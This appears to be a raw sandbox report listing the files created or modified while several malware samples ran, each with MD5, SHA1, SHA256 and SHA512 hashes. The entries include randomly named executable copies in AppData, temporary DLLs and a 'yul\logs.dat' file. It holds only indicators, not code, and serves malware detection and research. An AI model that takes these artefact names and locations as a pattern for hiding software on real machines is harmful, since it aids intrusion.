C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
| MD5 | 94d7d5f70d6d2ffdafb1bc5971357591 |
| SHA1 | 8a653ed7d552faaf82bf5a6c554e7d6ef3c79937 |
| SHA256 | a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5 |
| SHA512 | f655c869d24a23954755a8f132f57ffc16ad7f1aeeb0836111e8f09d6664f77746e2de4414b72a2d61b04856ad599c45d3a522a10cf8bcd0ae59f0378bf0b842 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\10194C65-FC8E-413C-AF23-8732E6E6A1CA
| MD5 | 0b1f5b87f25cc675c67d233481e9ba9c |
| SHA1 | a4582194b1bdc905019fe18c6bf34acc95261507 |
| SHA256 | 1e7f0a806164ba62fcd57198b9a55bea975f7c79a71443a032e79338434378dc |
| SHA512 | 7503640d5e963e5630d1dae7fa713b5cad463e3ab4577c9d5410397d5fcf04fce677ad97fded19725a2fd607d39a912bb23aae18c414bc200a71e85635d8c597 |
C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf
| MD5 | ce556b371242f7d1636bb0d7603b98a0 |
| SHA1 | 641b283d0c914c77ea6b05d75efd562f932a3dc0 |
| SHA256 | 940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71 |
| SHA512 | 81ec3104db754b36cb0df7ae87182796e1e4d251600b81f992138cf87fc5b2883701519a833af89eb6f4bf1cabc3d8f2564f15aaff14ee85b5e7aa056a3e2dcb |
C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe
| MD5 | a90c6e3eaed8cc4c94f550c1c7b529b0 |
| SHA1 | 3cd72d872546c17d2274da18ab00b3db75442621 |
| SHA256 | fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a |
| SHA512 | 0b109e9215e4f8463913e4285b05517c67ec5d311aa7dafd8564a16b29c63cfb03be529c6e36e9b4967af126b74995a31dcb57885384a931aa327d943b360315 |
C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe
| MD5 | a90c6e3eaed8cc4c94f550c1c7b529b0 |
| SHA1 | 3cd72d872546c17d2274da18ab00b3db75442621 |
| SHA256 | fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a |
| SHA512 | 0b109e9215e4f8463913e4285b05517c67ec5d311aa7dafd8564a16b29c63cfb03be529c6e36e9b4967af126b74995a31dcb57885384a931aa327d943b360315 |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 099603e393aa3ab3a05910003fe05d03 |
| SHA1 | 6561f88e70436583d3e08378e926791bfb6169dc |
| SHA256 | 156aa11795154557a3e2482316a6692466af7927f2a9c6c0d28dcda78e0f152c |
| SHA512 | 87ad10d22c371a5cddc3c0b80c150dfa6ac0459908aaed0405d4e9132dc9bb1e85fbb749d73737eebe8c3ea53cf471dcbc0e2b3e58b4933908e7c88db9fb4b1e |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 099603e393aa3ab3a05910003fe05d03 |
| SHA1 | 6561f88e70436583d3e08378e926791bfb6169dc |
| SHA256 | 156aa11795154557a3e2482316a6692466af7927f2a9c6c0d28dcda78e0f152c |
| SHA512 | 87ad10d22c371a5cddc3c0b80c150dfa6ac0459908aaed0405d4e9132dc9bb1e85fbb749d73737eebe8c3ea53cf471dcbc0e2b3e58b4933908e7c88db9fb4b1e |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe
| MD5 | 9a84688aca96d89b149e213f6d059bfb |
| SHA1 | 043c929249d1dcbdddf4cfd278be4425f25bb644 |
| SHA256 | f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52 |
| SHA512 | c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
| MD5 | 9727b1893f4a4adc3107a50a77813c8e |
| SHA1 | 93f76aa52461deeeb49672f7dd497cef15470186 |
| SHA256 | a5faca4539374a78a69ef31163e96a358c49014fb3e1fa413f4463b008499d51 |
| SHA512 | acf7309e548ba621e94c32b9062149670012bea2eaf280b97359f2ece6d61e7d60eabeb295c7690b42ed3c52982b317d96aa6205cb58fa44dcd553d8468751d5 |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe
| MD5 | 9a84688aca96d89b149e213f6d059bfb |
| SHA1 | 043c929249d1dcbdddf4cfd278be4425f25bb644 |
| SHA256 | f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52 |
| SHA512 | c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5 |
C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
| MD5 | cd88bacf312e7e4b45258af81ce8048b |
| SHA1 | f18cc032c483b6d94b856f7150e25f41509e59b6 |
| SHA256 | f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079 |
| SHA512 | cdc7007c2589ccc19cbbe286c8c0d5077d7118a2f7cb34bf735aff29f7e1b890bcf677ba1ef82b112ed2333a0108541a95b1c4461d8ea42fa2672b7bc7adcdd7 |
C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
| MD5 | cd88bacf312e7e4b45258af81ce8048b |
| SHA1 | f18cc032c483b6d94b856f7150e25f41509e59b6 |
| SHA256 | f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079 |
| SHA512 | cdc7007c2589ccc19cbbe286c8c0d5077d7118a2f7cb34bf735aff29f7e1b890bcf677ba1ef82b112ed2333a0108541a95b1c4461d8ea42fa2672b7bc7adcdd7 |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json
| MD5 | 75a71302083de37606971fb174fc2451 |
| SHA1 | f274276bd76eee51a5fa5a1a6b233cfcf768ffcd |
| SHA256 | fb64ee8bc1611a0ee95c475c149e603e5751758e0847bad24cc5fd0fce2198c4 |
| SHA512 | 1554270d82402f0c3073d89765abb89d0d881d517e0861019c2d44a0af8cd72e7b7a3225d8cb6b4b207a77db6a0a1f335e042280fb0ef4fcb46656849ccb4984 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.GovernedChannelStates.json
| MD5 | c56ff60fbd601e84edd5a0ff1010d584 |
| SHA1 | 342abb130dabeacde1d8ced806d67a3aef00a749 |
| SHA256 | 200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c |
| SHA512 | acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyEventActivityStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx
| MD5 | 5146f60c44f767730037618fc96a4587 |
| SHA1 | e6812cb8cf3b1a9a8ac5cf66e36ef3b0938ca1c2 |
| SHA256 | f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b |
| SHA512 | feec9090d3c4c411d907a115aa72e1bddccb40acddfe6eaf80c8279d4e329c92bfee42b75746bf67ad467f3c5c23f878c1fbb83dc4afe731ae3ef2562fbd9c65 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.Settings.json
| MD5 | e4e83f8123e9740b8aa3c3dfa77c1c04 |
| SHA1 | 5281eae96efde7b0e16a1d977f005f0d3bd7aad0 |
| SHA256 | 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31 |
| SHA512 | bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9 |
C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs
| MD5 | 18a4d7b53fe2eaaf191336f70c40e7b9 |
| SHA1 | 03f92cdcfb008c2799b54fc9ac9971e8773fe771 |
| SHA256 | e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120 |
| SHA512 | 7da74a078d676298502984bafd0752932eacd25ca4b3312aad81254d62eaad991987503f5ea7db5ee82a3b746793213042ba2c158b269026b56bcf5d55b22ded |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 10b7e885e2eb15906dc87aa0792e105c |
| SHA1 | 10e3d27a6b0ab5cf61dad6cd36aa061674949ac4 |
| SHA256 | feb035cc54e20ef6e16d443740b4b2c486f6f0d1711df7dba1987f968201e3a2 |
| SHA512 | e538fc83d1404ad0acc372427baa0ad9eddf55c379454985304eb8df325cb97ff60196da47d4b072fd1b5337cf08bd8cc6b63341c375a3406db10be066a9a261 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | dd45f09d7950df50662233c432e7a67b |
| SHA1 | a9a08ab552a9acc5947ac538e1c16606df717791 |
| SHA256 | ddee979f85e87f7a075484eab34db857bf60354180be48963549591335eefd9e |
| SHA512 | e11510e94da5af2c8b82e82dc359526f1278de4127e99922de956bc501e0248915f7dafe85263d9c81695c5fdab7f4be5ea8d13cabdbdb097f8e79895d52425b |
C:\Users\Admin\AppData\Local\Temp\nsi164A.tmp\klpaz.dll
| MD5 | 0c7637f6f292ff21c50d3ab536882144 |
| SHA1 | cd913b8ece6f2577eb07bdca61a7346184eb4962 |
| SHA256 | 69b6449b7cc5e34ae8f070d9ca882995248fdf80b583660fcc5a4916d78b1be2 |
| SHA512 | 7919a18357e7a11d0624f6fa8dba9e119119ea28b9843b7ebd32a65f82c2bc990abfae00c778457b7f51e0310c912c0554fe64093093fba90352b9b13b511496 |
C:\Users\Admin\AppData\Local\Temp\nsb1D5F.tmp\mydrvjhyy.dll
| MD5 | 71dd0c9a7ffabfca62ae8820cae0edab |
| SHA1 | efa543dcb10eab21decf8e5c5a71f73a6790e33f |
| SHA256 | b890a728b5ea08fa79b5ab93cfa556ab5100e1da04bd7211fc218a611d5eeb4b |
| SHA512 | c5ff0b3ccf641cd6126a6e1a929d3e6fb927a20319daf5192e26bab75f8ebc5b989d85688f0bc624f20d9b0210a9975308f2fe0cc0d53c8570409ff1bf80f375 |
C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe
| MD5 | cc1813159fd550c85aae1423853f3307 |
| SHA1 | 020f12dd4aa5a90971c350f447cb55a3640052ea |
| SHA256 | 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8 |
| SHA512 | 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GVVED0TI\json[1].json
| MD5 | 149c2823b7eadbfb0a82388a2ab9494f |
| SHA1 | 415fe979ce5fd0064d2557a48745a3ed1a3fbf9c |
| SHA256 | 06fa5d4e7fbfb1efdc19baa034601a894b21cf729785732853ced4bb40aca869 |
| SHA512 | f8fb6b7c93c4ab37f6e250ba8ac5c82f6e17fe52156cab81d34e91107d1da716b744bfe02ee0306497a3876d5352af789a1e66dab10e11e22065bac3050475fe |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2dckap5v.t3p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe
| MD5 | 94d7d5f70d6d2ffdafb1bc5971357591 |
| SHA1 | 8a653ed7d552faaf82bf5a6c554e7d6ef3c79937 |
| SHA256 | a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5 |
| SHA512 | f655c869d24a23954755a8f132f57ffc16ad7f1aeeb0836111e8f09d6664f77746e2de4414b72a2d61b04856ad599c45d3a522a10cf8bcd0ae59f0378bf0b842 |
C:\ProgramData\yul\logs.dat
| MD5 | a1b6bd2a98f951e5c37e51937f98fa6b |
| SHA1 | 0579fcfef9fd54ee63182e5e6394854c90a3be22 |
| SHA256 | e70c85cdd2c9d7a208542a65c3143530747e785adeb5b3ff892c164224392b63 |
| SHA512 | e641e8b9046b85bb2400c8883c468fcd30b83e3dc5b1219472fd248c6d951d7ef86dc69a63bf120acfe872220411955a6c0d66495a18100402b4f20d3ea704cc |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\ProgramData\yul\logs.dat
| MD5 | b0b45f6d418596b2ab5f132e05cfb376 |
| SHA1 | 961ef514cdd54d6bc110d15f52598738924d4a2a |
| SHA256 | bfd89af438a4d3217fab60f0968b2e48a907149bde21791e3dc291de912e99dc |
| SHA512 | 1e5e3e9ca6aab7c2e8e893fd9477e8dadc254b29eb6c3ebbc604a30d2e2cabc655785b52336435fe33349fbd23957295f417ecde2d428740404ac50685a3ca3b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b950ebe404eda736e529f1b0a975e8db |
| SHA1 | 4d2c020f1aa70e2bcb666a2dd144d1f3588430b8 |
| SHA256 | bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4 |
| SHA512 | 6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9b62544d156bc6b7302664fd5362b679 |
| SHA1 | 360c1a42f2f7d7eba5416b84c505ae4c175bd71a |
| SHA256 | c0a28e342325c08a2a230b552a945d943acd8f964e2c5c9a0cd6994236ca361d |
| SHA512 | 18c34d1aca9339473649948edae27ec65003b7f57a5c5e3aef6af642be4066542a0344702317362da5cd08346db5b37ce7625f1de14dfe35562293f8ccae3bd9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd5bee5b228c95f791498ec97b68bedd |
| SHA1 | 40f2ba525e44b2c255c86ce70bdba39f5055441f |
| SHA256 | 5aea469b4ca99d337284f85a8460338daa883c28a0b5a8a6ea1f67cd11ee0170 |
| SHA512 | a131d6512ec145c7ec3a5a742af5c4195f142c7b8b937c0953056f7c79f3e7ae136fbd12db4a73e0b1b2a30c0a42e682a541646d15ae2b3e40d11196f3f3fca3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e329cc2ec5712aaec3a3fde3b7a622e9 |
| SHA1 | b7df68579017ea07eafa90db5192df1de29758e4 |
| SHA256 | fbbc440416fea58389ccf4e14bfe665223dbb17c744f4d0c56e49eef751cbb5d |
| SHA512 | 945a7a769e52846d4c06cff3064479f742c2a1d329e5f046c8cb59e83f5fa135818cbb131c01868da1e29dc670115009ac7fe443045c7f47530c1fce73bb85f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | ca36933e6dea7aa507a272121b34fdbb |
| SHA1 | 3b4741ca0308b345de5ecf6c3565b1dbacb0fb86 |
| SHA256 | fd14449eb781c58e6e7196a384caf25cba0c59ebdba3b10f8ca0ecfd0c076b5d |
| SHA512 | 5a9b186ecf085765caee97a2910008dda926ce412001042e165184083a52fb5fb70f05ca781cd2f7740ecbd938895c77c5aa0f9eb8d812b92f412f336212720e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\54f09ac1-8b24-4a8f-96d4-6acc4f9702d1.dmp
| MD5 | 796c1a70e6f7776a60909fedc56f3a06 |
| SHA1 | ef86a3a85da5d1f9063af289f3e1b35580066544 |
| SHA256 | c7e7bcaead2c9a6ae058aa18a6575a6b6ea8ca74ba567a543d94819d7dab0b91 |
| SHA512 | 9c73f1ad9e60320cd9d85b5a0604b9024be32894065c015fb5b8c438e8a49a185eb48bbd3904aaa5c89325b3cc1709ed670425b08290ea3d4384c34bea9d7a02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 68fa59d779f4eb04d362576c6fb94e2c |
| SHA1 | d5a109ae8016acfd7bb3d65bbc341e4a49124440 |
| SHA256 | e9c61db580d4b5eafb3681cab191093f5f79658f177194b69adfb494be93f9e9 |
| SHA512 | 0169107e26c1c98babd0b4b183f4c6f19963ad49746581bd17dc0da2da49c9799bfbd07330452c04c5ff13755e01a2abf22e6616441732db5ea777f2d19bdd36 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2ef51b0b-cfd8-4053-8a0b-4a347e633aea.dmp
| MD5 | 5fd2eecf02dcf3ddf8aee535c7a1db6a |
| SHA1 | f33a8ae0d5d702a9d514d6c94e6dab44c1e40fbc |
| SHA256 | a0513f0d95a3ac31ee323e6ebc86be968c80ccc422809b6c5b6c2e1f215111ed |
| SHA512 | eb3e0087a78f99f56afb9ef9a2c63f30f2e0e95024454f0d9f44fba10926503953c1520ae1683675551b4adad1d30b2ad1c1fc5ebd1bc373ad8590cc60151d64 |
C:\ProgramData\yul\logs.dat
| MD5 | 2836bcba3c461e607845ae3518136579 |
| SHA1 | 54d2d37cf9065da0f09b69836f6c975f396ec54e |
| SHA256 | 2b719d741defad231508d3130894c3d4ec86c2ed9deed630f60ffdab958d03b8 |
| SHA512 | 27ba541a466ac7e5005d048c803b8ace84447f30a4c567f36f62db2bce3db68fe303f81b2801fded13ae691b3a3d259c7fe3b181935c1b0b0b432862afb42d93 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg
| MD5 | bd74a3c50fd08981e89d96859e176d68 |
| SHA1 | 0a98b96aefe60b96722d587b7c3aabcd15927618 |
| SHA256 | ab305218ee0e95fa553885fa52f3a25dcc13b4deade8b7993ccb9f230a272837 |
| SHA512 | 0704243904abc3691177e34606fe2741945f69cf7ecb898655d98e81b145bf707d20cfa0af01fb3aa1cd170e2f3ce8f625b1612e0fcf5eba01f770617ffc9f1e |
C:\ProgramData\yul\logs.dat
| MD5 | b97beaf3b95f3b354a19a93bdc36bb1a |
| SHA1 | 587348dc61688a3537711d9af922527b2813b33a |
| SHA256 | 001413fa305b4830a173cdf2ff7eeb26c3615152599aad9c3d01b4011e837469 |
| SHA512 | 1073b1ef95677eaeccedabcb73eaed26fa7240911bc3cd83e440bdf7a59e5b842f29fcb0e7be6a3e726ee099110d33101f8e4d05e9a2eb618e13cf8786fe0ae0 |